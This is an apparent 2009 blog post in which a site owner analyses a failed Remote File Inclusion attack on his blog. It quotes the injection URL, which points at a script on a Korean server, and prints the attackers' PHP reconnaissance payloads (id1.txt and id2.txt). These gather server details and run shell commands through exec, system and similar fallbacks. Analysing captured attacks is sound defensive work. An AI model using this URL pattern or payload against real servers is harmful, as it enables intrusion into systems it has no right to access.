Looks like a bunch of Australian kids from Milton Queensland using a Korean school site to store their hacking scripts attempted to break into my server the other day. They failed but a record of their attempts was just sent to me and curiosity gets the better of me sometimes. read: http://en.wikipedia.org/wiki/Remote_File_Inclusion for more info.

A bunch of entries where they attempted to visit variations on the url:

http://fightskillz.com/category////?_SERVER[DOCUMENT_ROOT]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?

It appears they attempted to run their own script located on the Korean server, in the root directory of the script that my blog is running at. It seems like a pretty juvenile attempt at hacking, a textbook copied attempt at php injection. For interest's sake the id1.txt file they were trying to run off my server contains the following

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

I had a look at id2.txt as well, just assuming there would be id2 if there was id1, which was much more comprehensive, seems to grab all kinds of system variables and information. Check it out below:

<?php
##[ Fx29ID ]##
fx("ID","FeeL"."CoMz");
$P   = @getcwd();
$IP  = @getenv("SERVER_ADDR");
$UID = fx29exec("id");
fx("SAFE",@safemode()?"ON":"OFF");
fx("OS",@PHP_OS);
fx("UNAME",@php_uname());
fx("SERVER",($IP)?$IP:"-");
fx("USER",@get_current_user());
fx("UID",($UID)?$UID:"uid=".@getmyuid()." gid=".@getmygid());
fx("DIR",$P);
fx("PERM",(@is_writable($P))?"[W]":"[R]");
fx("HDD","Used: ".hdd("used")." Free: ".hdd("free")." Total: ".hdd("total"));
fx("DISFUNC",@getdisfunc());
##[ FX29SHEXEC ]##
function fx($t,$c) { echo "$t: "; echo (is_array($c))?join(" ",$c):$c; echo "<br>"; }
function safemode() { return (@ini_get("safe_mode") OR eregi("on",@ini_get("safe_mode")) ) ? TRUE : FALSE; }
function getdisfunc() { $rez = explode(",",@ini_get("disable_functions")); return (!empty($rez))?$rez:array(); }
function enabled($func) { return (function_exists($func) && is_callable($func) && !in_array($func,getdisfunc())) ? TRUE : FALSE; }
function fx29exec($cmd) {
  if (enabled("exec")) { exec($cmd,$o); $rez = join("\r\n",$o); }
  elseif (enabled("shell_exec")) { $rez = shell_exec($cmd); }
  elseif (enabled("system")) { @ob_start(); @system($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
  elseif (enabled("passthru")) { @ob_start(); passthru($cmd); $rez = @ob_get_contents(); @ob_end_clean(); }
  elseif (enabled("popen") && is_resource($h = popen($cmd.' 2>&1', 'r')) ) { while ( !feof($h) ) { $rez .= fread($h, 2096);  } pclose($h); }
  else { $rez = "Error!"; }
  return $rez;
}
function vsize($size) {
  if (!is_numeric($size)) { return FALSE; }
  else {
    if ( $size >= 1073741824 ) { $size = round($size/1073741824*100)/100 ." GB"; }
    elseif ( $size >= 1048576 ) { $size = round($size/1048576*100)/100 ." MB"; }
    elseif ( $size >= 1024 ) { $size = round($size/1024*100)/100 ." KB"; }
    else { $size = $size . " B"; }
    return $size;
  }
}
function hdd($type) {
  $P = @getcwd(); $T = @disk_total_space($P); $F = @disk_free_space($P); $U = $T - $U;
  $hddspace = array("total" => vsize($T), "free"  => vsize($F), "used"  => vsize($U));
  return $hddspace[$type];
}
die("FeeLCoMz");
?>

I guess they're aptly name id[1|2].txt for id-ing the system and used in that order to test for vulnerability without alerting people to the depth of access that would be granted by id2.txt if the targeted vulnerability existed on the victim server. I did a few Google searches and came up with a bunch of different ip addresses and a bunch of different servers hosting the exact same files. I guess somewhere out there.. in Milton Queensland Australia,  there's a young idiot trying to be a hacker...

This entry was posted on Sunday, July 26th, 2009 at 3:30 am and is filed under Other Idiots, Tech, The Web. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.